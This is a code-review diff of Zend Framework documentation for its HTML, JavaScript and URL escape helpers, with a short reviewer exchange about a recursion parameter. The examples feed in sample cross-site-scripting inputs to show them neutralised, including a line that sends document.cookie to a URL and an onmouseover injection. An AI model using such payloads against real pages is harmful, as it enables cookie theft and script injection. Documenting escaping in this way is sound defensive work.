doc/book/helpers/escape.md

```diff
@@ -0,0 +1,248 @@
+```
+
+## EscapeJs
+
+```php
+$js = "window.location = 'https://framework.zend.com/?cookie=' + document.cookie";
+
+echo $this->escapeJs($js);
+```
+
+Output:
+
+```js
+window.location\x20\x3D\x20\x27https\x3A\x2F\x2Fframework.zend.com\x2F\x3Fcookie\x3D\x27\x20\x2B\x20document.cookie
+```
+
+## EscapeUrl
+
+```php
+<?php
+$url = <<<JS
+" onmouseover="alert('zf2')
+JS;
+?>
+
+<a href="http://example.com/?name=<?= $this->escapeUrl($url) ?>">click</a>
+```
+
+Output:
+
+```html
+<a href="http://example.com/?name=%22%20onmouseover%3D%22alert%28%27zf2%27%29">click</a>
+```
+
+## Using Encoding
+
+```php
+$this->escapeHtml()->setEncoding('iso-8859-15');
+```
+
+All allowed encodings can be found in the
+[documentation of zend-escaper](https://docs.zendframework.com/zend-escaper/configuration/).
+
+### Get Current Value
+
+To get the current value of this option, use the `getEncoding()` method.
+
+```php
+$this->escapeHtml()->setEncoding('iso-8859-15');
+
+echo $this->escapeHtml()->getEncoding(); // iso-8859-15
+```
+
+### Default Value
+
+The default value for all escape helpers is `utf-8`.
+
+## Using Recursion
+
+All escape helpers can use recursion for the given values during the escape
+operation. This allows the escaping of the datatypes `array` and `object`. 
+
+### Escape an Array
+
+To escape an `array`, the second parameter `$recurse` must be use the constant
+`RECURSE_ARRAY` of an escape helper: 
+
+```php
+$html = [
+    'headline' => '<h1>Foo</h1>',
+    'content'  => [
+        'paragraph' => '<p>Bar</p>',
+    ],
+];
+
+var_dump($this->escapeHtml($html, Zend\View\Helper\EscapeHtml::RECURSE_ARRAY));
+```
+
+Output:
+
+```php
+array(2) {
+  'headline' =>
+  string(24) "&lt;h1&gt;Foo&lt;/h1&gt;"
+  'content' =>
+  array(1) {
+    'paragraph' =>
+    string(22) "&lt;p&gt;Bar&lt;/p&gt;"
+  }
+}
+```
+
+### Escape an Object
+
+An escape helper can use the `__toString()` method of an object. No additional
+parameter is needed:
+
+```php
+$object = new class {
+    public function __toString() : string
+    {
+        return '<h1>Foo</h1>';
+    }
+};
+
+echo $this->escapeHtml($object); // "&lt;h1&gt;Foo&lt;/h1&gt;"
+```
+
+An escape helper can also use the `toArray()` method of an object. The second
+parameter `$recurse` must be use the constant `RECURSE_OBJECT` of an escape
+helper: 
+
+```php
+$object = new class {
+    public function toArray() : array
+    {
+        return ['headline' => '<h1>Foo</h1>'];
+    }
+};
+
+var_dump($this->escapeHtml($object, Zend\View\Helper\EscapeHtml::RECURSE_OBJECT));
+```
+
+Output:
+
+```php
+array(1) {
+  'headline' =>
+  string(3) "&lt;h1&gt;Foo&lt;/h1&gt;"
+}
+```
+
+If the object does not contains the methods `__toString()` or `toArray()` then
+the object is casted to an `array`:
+
+```php
+$object = new class {
+    public $headline = '<h1>Foo</h1>';
+};
+
+var_dump($this->escapeHtml($object, Zend\View\Helper\EscapeHtml::RECURSE_OBJECT));
```

Comment:
is the 2nd param required here?
I assume the same result we get without it.

Reply:
Without the second parameter an exception is thrown:

https://github.com/zendframework/zend-view/blob/b4861879541dcb7988dcb9b0eb536fc048db098b/src/Helper/Escaper/AbstractHelper.php#L72-L74